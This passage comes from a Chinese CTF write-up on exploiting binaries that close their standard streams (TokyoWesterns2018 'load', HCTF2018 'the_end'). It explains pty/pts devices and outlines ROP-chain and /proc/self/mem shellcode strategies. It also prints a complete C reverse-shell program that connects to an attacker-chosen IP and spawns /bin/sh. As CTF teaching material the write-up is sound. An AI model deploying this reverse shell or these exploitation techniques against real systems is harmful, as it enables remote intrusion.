class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kr">__int64</span> <span class="kr">__fastcall</span> <span class="nf">main</span><span class="p">(</span><span class="kr">__int64</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">a2</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">a3</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">a1a</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> <span class="c1">// [rsp+0h] [rbp-30h] </span><span class="c1"></span> <span class="kr">__int64</span> <span class="n">size</span><span class="p">;</span> <span class="c1">// [rsp+20h] [rbp-10h] </span><span class="c1"></span> <span class="n">__off_t</span> <span class="n">offset</span><span class="p">;</span> <span class="c1">// [rsp+28h] [rbp-8h] </span><span class="c1"></span> <span class="n">set_buffer</span><span class="p">();</span> <span class="n">_printf_chk</span><span class="p">(</span><span class="mi">1LL</span><span class="p">,</span> <span class="s">&#34;Load file Service</span><span class="se">\n</span><span class="s">Input file name: &#34;</span><span class="p">);</span> <span class="n">get_str</span><span class="p">(</span><span class="n">filename</span><span class="p">,</span> <span class="mi">128</span><span class="p">);</span> <span class="n">_printf_chk</span><span class="p">(</span><span class="mi">1LL</span><span class="p">,</span> <span class="s">&#34;Input offset: &#34;</span><span class="p">);</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">get_int</span><span class="p">();</span> <span class="n">_printf_chk</span><span class="p">(</span><span class="mi">1LL</span><span class="p">,</span> <span class="s">&#34;Input size: &#34;</span><span class="p">);</span> <span class="n">size</span> <span class="o">=</span> <span class="n">get_int</span><span class="p">();</span> <span class="n">load_file</span><span class="p">(</span><span class="n">a1a</span><span class="p">,</span> <span class="n">filename</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span> <span class="n">close_all</span><span class="p">();</span> <span class="k">return</span> <span class="mi">0LL</span><span class="p">;</span> <span class="p">}</span> <span class="kt">void</span> <span class="kr">__fastcall</span> <span class="nf">load_file</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">a1</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">a2</span><span class="p">,</span> <span class="n">__off_t</span> <span class="n">a3</span><span class="p">,</span> <span class="kr">__int64</span> <span class="n">a4</span><span class="p">)</span> <span class="p">{</span> <span class="kr">__int64</span> <span class="n">nbytes</span><span class="p">;</span> <span class="c1">// [rsp+0h] [rbp-30h] </span><span class="c1"></span> <span class="n">__off_t</span> <span class="n">offset</span><span class="p">;</span> <span class="c1">// [rsp+8h] [rbp-28h] </span><span class="c1"></span> <span class="kt">int</span> <span class="n">fd</span><span class="p">;</span> <span class="c1">// [rsp+2Ch] [rbp-4h] </span><span class="c1"></span> <span class="n">offset</span> <span class="o">=</span> <span class="n">a3</span><span class="p">;</span> <span class="n">nbytes</span> <span class="o">=</span> <span class="n">a4</span><span class="p">;</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">a2</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="n">fd</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span> <span class="p">)</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;You can&#39;t read this file...&#34;</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">lseek</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">a1</span><span class="p">,</span> <span class="n">nbytes</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="p">)</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Load file complete!&#34;</span><span class="p">);</span> <span class="n">close</span><span class="p">(</span><span class="n">fd</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="kt">void</span> <span class="nf">close_all</span><span class="p">()</span> <span class="p">{</span> <span class="n">close</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="n">close</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="n">close</span><span class="p">(</span><span class="mi">2</span><span class="p">);</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>栈溢出的漏洞很好发现，但关键是我们只有打开远程文件，并从文件中读取内容的能力。根据一切皆文件的思想，如果打开 <code>/proc/self/fd/0</code> ，在 load_file() 中就相当于 read(3, a1, nbytes)，但注意此时的 3 是 stdin，也就是说可以通过打开 /proc/self/fd/0 ，并从 stdin 读入数据来控制缓冲区内容。</p> <p>那么我们要怎么利用呢？分析两种方法。</p> <h3 id="ropchain">ropchain</h3> <h4 id="pty-和-pts">pty 和 pts</h4> <p>先介绍一下什么是 pty 和 pts。我们已经知道 fd 指向被打开的文件，那么我们看一下 stdin，stdout 和 stderr 指向什么</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">others_reverse_shell <span class="o">[</span>master●<span class="o">]</span> ./file_descriptor ....... others_reverse_shell <span class="o">[</span>master●<span class="o">]</span> pgrep file_descriptor <span class="m">8942</span> others_reverse_shell <span class="o">[</span>master●<span class="o">]</span> file /proc/8942/fd/0 /proc/8942/fd/0: symbolic link to /dev/pts/2 others_reverse_shell <span class="o">[</span>master●<span class="o">]</span> file /proc/8942/fd/1 /proc/8942/fd/1: symbolic link to /dev/pts/2 others_reverse_shell <span class="o">[</span>master●<span class="o">]</span> file /proc/8942/fd/2 /proc/8942/fd/2: symbolic link to /dev/pts/2 </code></pre></td></tr></table> </div> </div><p>都指向了 <code>/dev/pts/2</code> 这个文件，pts 是 tty 的一部分，后续会介绍。</p> <p>在第一篇已经说到了 tty 子系统是用来管理终端的，对每一个连接的终端，都会有一个 tty 设备与其对应，关系如下：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback"> +----------------+ | TTY Driver | | | | +-------+ | +----------------+ +------------+ | | |&lt;----------&gt;| User process A | | Terminal A |&lt;---------&gt;| ttyS0 | | +----------------+ +------------+ | | |&lt;----------&gt;| User process B | | +-------+ | +----------------+ | | | +-------+ | +----------------+ +------------+ | | |&lt;----------&gt;| User process C | | Terminal B |&lt;---------&gt;| ttyS1 | | +----------------+ +------------+ | | |&lt;----------&gt;| User process D | | +-------+ | +----------------+ | | +----------------+ </code></pre></td></tr></table> </div> </div><p>在 shell 里使用 <code>tty</code> 命令可以查看当前 shell 被关联到了哪个 tty</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">others_reverse_shell <span class="o">[</span>master●<span class="o">]</span> tty /dev/pts/3 others_reverse_shell <span class="o">[</span>master●<span class="o">]</span> <span class="nb">echo</span> <span class="nb">test</span> &gt; /dev/pts/3 <span class="nb">test</span> others_reverse_shell <span class="o">[</span>master●<span class="o">]</span> lsof /dev/pts/3 COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME zsh <span class="m">8944</span> m4x 0u CHR 136,3 0t0 <span class="m">6</span> /dev/pts/3 zsh <span class="m">8944</span> m4x 1u CHR 136,3 0t0 <span class="m">6</span> /dev/pts/3 zsh <span class="m">8944</span> m4x 2u CHR 136,3 0t0 <span class="m">6</span> /dev/pts/3 zsh <span class="m">8944</span> m4x 10u CHR 136,3 0t0 <span class="m">6</span> /dev/pts/3 lsof <span class="m">10598</span> m4x 0u CHR 136,3 0t0 <span class="m">6</span> /dev/pts/3 lsof <span class="m">10598</span> m4x 1u CHR 136,3 0t0 <span class="m">6</span> /dev/pts/3 lsof <span class="m">10598</span> m4x 2u CHR 136,3 0t0 <span class="m">6</span> /dev/pts/3 </code></pre></td></tr></table> </div> </div><p>可以看到当前 shell 使用的是 /dev/pts/3，因此直接往 /dev/pts/3 写数据跟标准输出是一样的；</p> <p>使用 lsof 可以看出当前 shell 和 lsof 进程的 stdin(0u)，stdout(1u)，stderr(2u) 都绑定到了这个 tty 上，此时它们的关系如下</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback"> Input +--------------------------+ R/W +------+ -----------&gt;| |&lt;----------&gt;| bash | | /dev/pts/3 | +------+ &lt;-----------| |&lt;----------&gt;| lsof | Output | Foreground process group | R/W +------+ +--------------------------+ </code></pre></td></tr></table> </div> </div><p>然后说一下 pty，使用 <code>man 7 pty</code> 查看 pty 的用户手册</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">DESCRIPTION A pseudoterminal (sometimes abbreviated &#34;pty&#34;) is a pair of virtual character devices that provide a bidirectional communication channel. One end of the channel is called the master; the other end is called the slave. </code></pre></td></tr></table> </div> </div><p>pty 属于伪终端，“伪” 体现在 pty 是逻辑上的终端设备，但多用于模拟终端程序，比如使用 ssh，talnet 和 windows 下的 putty 等连接的终端时，此时并没有真正的设备连接到了主机，而是建立了一个<strong>伪终端</strong>来模拟各种行为。</p> <p>从 man 手册中也可以看出 pty 分为 master 和 slave 两部分，其中 slave 部分称为 pts，master 称为 ptmx，二者结合实现 pty。工作流程可以简单的解释为进程通过调用 API 请求 ptmx 建立了一个 pts，然后会得到连接到 ptmx 的 fd 和一个新建的 pts（可以使用 <code>man pts</code> 查看更多细节）。</p> <h4 id="构造-ropchain">构造 ropchain</h4> <p>说了半天，再回到这道题目，虽然这道题目关闭了 stdin, stdout 和 stderr，pty 还在，换句话说，如果我们能控制 /dev/pts/? 的 fd 为 1，那么 puts(flag) 时就会把输出传递给 /dev/pts/? ，也就是我们能在显示屏上看到 flag。</p> <p>总结一下思路：</p> <ol> <li>利用 open(&quot;/proc/self/fd/0&rdquo;, 0) 来构造 ropchain</li> <li>ropchain 通过 open 和 read 把 flag 读到一个固定地址，同时控制 open(&quot;/dev/pty/?&quot;, 2) 返回的 fd 为 1</li> <li>puts(flag) 时，系统调用为 write(1, flag, len(flag))，也就是 flag 的内容将会输出到显示屏上</li> </ol> <p><a href="https://github.com/0x01f/pwn_repo/blob/master/TokyoWesterns2018_load/ropchian.py">ropchian exploit here</a></p> <h3 id="reverse-shell">reverse shell</h3> <p>或者我们可以使用 reverse shell 来 get shell，这需要用到一些 procfs 的知识，不准备细讲，只需要知道可以通过往 /proc/self/mem 写数据更改 binary 内容即可（类似的题目有赛博地球杯的 <a href="https://github.com/0x01f/pwn_repo/tree/master/Cyber2017_fileManager">fileManager</a> 这道题目）。</p> <p>通过 vmmap 可以看出 0x400000 - 0x401000 段具有可以行权限，且地址是固定的，因此我们可以控制 open(&quot;/proc/self/mem&rdquo;, 2) 返回的 fd 为 1，然后通过 puts(shellcode) 既可以将 shellcode 写到这段地址上，再控制 rip 到 shellcode 就可以建立一个 reverse shell（reverse shell 的经典题目有 pwnable.tw 的 kidding 等）。</p> <p>总结一下思路：</p> <ol> <li>利用 open(&quot;/proc/self/fd/0&rdquo;, 0) 来构造 ropchain，ropchain 实现 open(&quot;/proc/self/mem&rdquo;, 2) 返回的 fd 为 1</li> <li>通过 puts(shellcode) 将 shellcode 写到具有可执行权限的代码段，可以用 lseek 控制 puts 写的位置</li> <li>控制 rip 为 shellcode 建立 reverse shell</li> <li>可以使用 /dev/stdin 代替 /proc/self/fd/0，效果一样，可以给 shellcode 留下更多空间</li> </ol> <p><a href="https://github.com/0x01f/pwn_repo/blob/master/TokyoWesterns2018_load/reverse_shell.py">revrese shell exploit here</a></p> <h3 id="reverse-shell-原理">reverse shell 原理</h3> <p>简单介绍一下 reverse shell 的原理，先给出经典的 reverse shell 的建立方式</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="n">others_reverse_shell</span> <span class="p">[</span><span class="n">master</span><span class="err">●</span><span class="p">]</span> <span class="n">bat</span> <span class="n">reverse_shell</span><span class="p">.</span><span class="n">c</span> <span class="err">───────┬─────────────────────────────────────────────────────────────────────────────────</span> <span class="err">│</span> <span class="nl">File</span><span class="p">:</span> <span class="n">reverse_shell</span><span class="p">.</span><span class="n">c</span> <span class="err">───────┼─────────────────────────────────────────────────────────────────────────────────</span> <span class="mi">1</span> <span class="err">│</span> <span class="c1">// reverse shell </span><span class="c1"></span> <span class="mi">2</span> <span class="err">│</span> <span class="err">#</span><span class="n">include</span> <span class="o">&lt;</span><span class="n">sys</span><span class="o">/</span><span class="n">types</span><span class="p">.</span><span class="n">h</span><span class="o">&gt;</span> <span class="mi">3</span> <span class="err">│</span> <span class="err">#</span><span class="n">include</span> <span class="o">&lt;</span><span class="n">sys</span><span class="o">/</span><span class="n">socket</span><span class="p">.</span><span class="n">h</span><span class="o">&gt;</span> <span class="mi">4</span> <span class="err">│</span> <span class="err">#</span><span class="n">include</span> <span class="o">&lt;</span><span class="n">netinet</span><span class="o">/</span><span class="n">in</span><span class="p">.</span><span class="n">h</span><span class="o">&gt;</span> <span class="mi">5</span> <span class="err">│</span> <span class="mi">6</span> <span class="err">│</span> <span class="err">#</span><span class="n">define</span> <span class="nb">NULL</span> <span class="mi">0</span> <span class="mi">7</span> <span class="err">│</span> <span class="mi">8</span> <span class="err">│</span> <span class="kt">int</span> <span class="n">socket</span><span class="p">(</span><span class="kt">int</span> <span class="n">domain</span><span class="p">,</span> <span class="kt">int</span> <span class="n">type</span><span class="p">,</span> <span class="kt">int</span> <span class="n">protocal</span><span class="p">);</span> <span class="mi">9</span> <span class="err">│</span> <span class="kt">int</span> <span class="n">connect</span><span class="p">(</span><span class="kt">int</span> <span class="n">sockfd</span><span class="p">,</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="n">addr</span><span class="p">,</span> <span class="n">socklen_t</span> <span class="n">addrlen</span><span class="p">);</span> <span class="mi">10</span> <span class="err">│</span> <span class="kt">int</span> <span class="n">dup2</span><span class="p">(</span><span class="kt">int</span> <span class="n">oldfd</span><span class="p">,</span> <span class="kt">int</span> <span class="n">newfd</span><span class="p">);</span> <span class="mi">11</span> <span class="err">│</span> <span class="kt">int</span> <span class="n">execve</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">filename</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="k">const</span> <span class="n">argv</span><span class="p">[],</span> <span class="kt">char</span> <span class="o">*</span><span class="k">const</span> <span class="n">envp</span><span class="p">[]);</span> <span class="mi">12</span> <span class="err">│</span> <span class="kt">int</span> <span class="n">close</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">);</span> <span class="mi">13</span> <span class="err">│</span> <span class="mi">14</span> <span class="err">│</span> <span class="kt">void</span> <span class="n">reverse_shell</span><span class="p">()</span> <span class="mi">15</span> <span class="err">│</span> <span class="p">{</span> <span class="mi">16</span> <span class="err">│</span> <span class="kt">char</span><span class="o">*</span> <span class="n">address</span> <span class="o">=</span> <span class="s">&#34;your_ip&#34;</span><span class="p">;</span> <span class="mi">17</span> <span class="err">│</span> <span class="kt">int</span> <span class="n">port</span> <span class="o">=</span> <span class="n">your_port</span><span class="p">;</span> <span class="mi">18</span> <span class="err">│</span> <span class="mi">19</span> <span class="err">│</span> <span class="c1">// create a new socket but it has no address assigned yet </span><span class="c1"></span> <span class="mi">20</span> <span class="err">│</span> <span class="kt">int</span> <span class="n">sockfd</span> <span class="o">=</span> <span class="n">socket</span><span class="p">(</span><span class="n">AF_INET</span><span class="cm">/* 2 */</span><span class="p">,</span> <span class="n">SOCK_STREAM</span><span class="cm">/* 1 */</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="mi">21</span> <span class="err">│</span> <span class="mi">22</span> <span class="err">│</span> <span class="c1">// create sockaddr_in structure for use with connect function </span><span class="c1"></span> <span class="mi">23</span> <span class="err">│</span> <span class="k">struct</span> <span class="n">sockaddr_in</span> <span class="n">sock_in</span><span class="p">;</span> <span class="mi">24</span> <span class="err">│</span> <span class="n">sock_in</span><span class="p">.</span><span class="n">sin_family</span> <span class="o">=</span> <span class="n">AF_INET</span><span class="p">;</span> <span class="mi">25</span> <span class="err">│</span> <span class="n">sock_in</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">.</span><span class="n">s_addr</span> <span class="o">=</span> <span class="n">inet_addr</span><span class="p">(</span><span class="n">address</span><span class="p">);</span> <span class="mi">26</span> <span class="err">│</span> <span class="n">sock_in</span><span class="p">.</span><span class="n">sin_port</span> <span class="o">=</span> <span class="n">htons</span><span class="p">(</span><span class="n">port</span><span class="p">);</span> <span class="mi">27</span> <span class="err">│</span> <span class="mi">28</span> <span class="err">│</span> <span class="c1">// perform connect to target IP address and port </span><span class="c1"></span> <span class="mi">29</span> <span class="err">│</span> <span class="n">connect</span><span class="p">(</span><span class="n">sockfd</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span><span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">sock_in</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr_in</span><span class="p">));</span> <span class="mi">30</span> <span class="err">│</span> <span class="mi">31</span> <span class="err">│</span> <span class="c1">// duplicate file descriptors for STDIN/STDOUT/STDERR </span><span class="c1"></span> <span class="mi">32</span> <span class="err">│</span> <span class="k">for</span><span class="p">(</span><span class="kt">int</span> <span class="n">n</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">n</span> <span class="o">&lt;=</span> <span class="mi">2</span><span class="p">;</span> <span class="n">n</span><span class="o">++</span><span class="p">)</span> <span class="mi">33</span> <span class="err">│</span> <span class="p">{</span> <span class="mi">34</span> <span class="err">│</span> <span class="n">dup2</span><span class="p">(</span><span class="n">sockfd</span><span class="p">,</span> <span class="n">n</span><span class="p">);</span> <span class="mi">35</span> <span class="err">│</span> <span class="p">}</span> <span class="mi">36</span> <span class="err">│</span> <span class="mi">37</span> <span class="err">│</span> <span class="c1">// execve(&#34;/bin/sh&#34;, 0, 0) </span><span class="c1"></span> <span class="mi">38</span> <span class="err">│</span> <span class="n">execve</span><span class="p">(</span><span class="s">&#34;/bin/sh&#34;</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span> <span class="mi">39</span> <span class="err">│</span> <span class="mi">40</span> <span class="err">│</span> <span class="n">close</span><span class="p">(</span><span class="n">sockfd</span><span class="p">);</span> <span class="mi">41</span> <span class="err">│</span> <span class="mi">42</span> <span class="err">│</span> <span class="k">return</span><span class="p">;</span> <span class="mi">43</span> <span class="err">│</span> <span class="p">}</span> <span class="mi">44</span> <span class="err">│</span> <span class="mi">45</span> <span class="err">│</span> <span class="mi">46</span> <span class="err">│</span> <span class="kt">int</span> <span class="n">main</span><span class="p">()</span> <span class="mi">47</span> <span class="err">│</span> <span class="p">{</span> <span class="mi">48</span> <span class="err">│</span> <span class="n">reverse_shell</span><span class="p">();</span> <span class="mi">49</span> <span class="err">│</span> <span class="mi">50</span> <span class="err">│</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="mi">51</span> <span class="err">│</span> <span class="p">}</span> <span class="err">───────┴─────────────────────────────────────────────────────────────────────────────────</span> </code></pre></td></tr></table> </div> </div><p>如果前两篇看懂的话，那么参考这个代码，reverse shell 的原理就很好理解了</p> <ol> <li>建立一个 socket，此时会新建一个 fd</li> <li>给这个 socket 分配 ip 和 port</li> <li>通过 dup2，将 socket 的 fd 复制到 0，1 和 2 上，这样 shell 的 io 就完全通过建立的 socket 了，这时如果我们监听这个 ip 和 port，就相当于拿到了一个 shell</li> </ol> <h2 id="level-4-hctf2018---the_end">level 4: HCTF2018 - the_end</h2> <p><a href="https://veritas501.space">veritas501师傅</a> 出的题目，很独特，关闭了 stdout 和 stderr，但保留了 stdin。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">void</span> <span class="kr">__fastcall</span> <span class="n">__noreturn</span> <span class="nf">main</span><span class="p">(</span><span class="kr">__int64</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">a2</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">a3</span><span class="p">)</span> <span class="p">{</span> <span class="kt">signed</span> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// [rsp+4h] [rbp-Ch] </span><span class="c1"></span> <span class="kt">void</span> <span class="o">*</span><span class="n">buf</span><span class="p">;</span> <span class="c1">// [rsp+8h] [rbp-8h] </span><span class="c1"></span> <span class="n">sleep</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;here is a gift %p, good luck ;)</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">sleep</span><span class="p">);</span> <span class="n">fflush</span><span class="p">(</span><span class="n">_bss_start</span><span class="p">);</span> <span class="n">close</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="n">close</span><span class="p">(</span><span class="mi">2</span><span class="p">);</span> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;=</span> <span class="mi">4</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span> <span class="p">{</span> <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">buf</span><span class="p">,</span> <span class="mi">8uLL</span><span class="p">);</span> <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">1uLL</span><span class="p">);</span> <span class="p">}</span> <span class="n">exit</span><span class="p">(</span><span class="mi">1337</span><span class="p">);</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>解法就不说了，可以参考 <a href="https://bysec.io/hctf/writeup.html#the-end">官方 writeup</a>。但更多人用的应该是非预期解直接使用 one_gadget。</p> <p>总之，可以用某种方式拿到一个交互式的 shell （因为 stdout 已经被关闭，所以不会有输出）。可以通过 <code>cat flag &gt;&amp;0</code>， <code>exec 1&gt;&amp;0; cat flag</code> 等方法得到 flag。</p> <p>为什么可以通过 <code>stdin</code> 来输出呢？因为</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">~ file /proc/self/fd/0 /proc/self/fd/0: symbolic link to /dev/pts/3 </code></pre></td></tr></table> </div> </div><p><code>stdin</code> 实际也是 pts 的软连接，因此可以输出。</p> <p>需要注意的是，很多人在做这道题目时可能远程成功了，但本地使用 <code>pwnlib.process</code> 时失败，这是因为在 pwntools 的 <a href="https://github.com/Gallopsled/pwntools/blob/dev/pwnlib/tubes/tube.py#L798-L815">源码</a> 中有这样一段</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"> <span class="k">try</span><span class="p">:</span> <span class="k">while</span> <span class="ow">not</span> <span class="n">go</span><span class="o">.</span><span class="n">isSet</span><span class="p">():</span> <span class="k">if</span> <span class="n">term</span><span class="o">.</span><span class="n">term_mode</span><span class="p">:</span> <span class="n">data</span> <span class="o">=</span> <span class="n">term</span><span class="o">.</span><span class="n">readline</span><span class="o">.</span><span class="n">readline</span><span class="p">(</span><span class="n">prompt</span> <span class="o">=</span> <span class="n">prompt</span><span class="p">,</span> <span class="nb">float</span> <span class="o">=</span> <span class="bp">True</span><span class="p">)</span> <span class="k">else</span><span class="p">:</span> <span class="n">data</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">stdin</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">&lt;==</span> <span class="n">exception</span> <span class="k">if</span> <span class="n">data</span><span class="p">:</span> <span class="k">try</span><span class="p">:</span> <span class="bp">self</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="k">except</span> <span class="ne">EOFError</span><span class="p">:</span> <span class="n">go</span><span class="o">.</span><span class="n">set</span><span class="p">()</span> <span class="bp">self</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s1">&#39;Got EOF while sending in interactive&#39;</span><span class="p">)</span> <span class="k">else</span><span class="p">:</span> <span class="n">go</span><span class="o">.</span><span class="n">set</span><span class="p">()</span> <span class="k">except</span> <span class="ne">KeyboardInterrupt</span><span 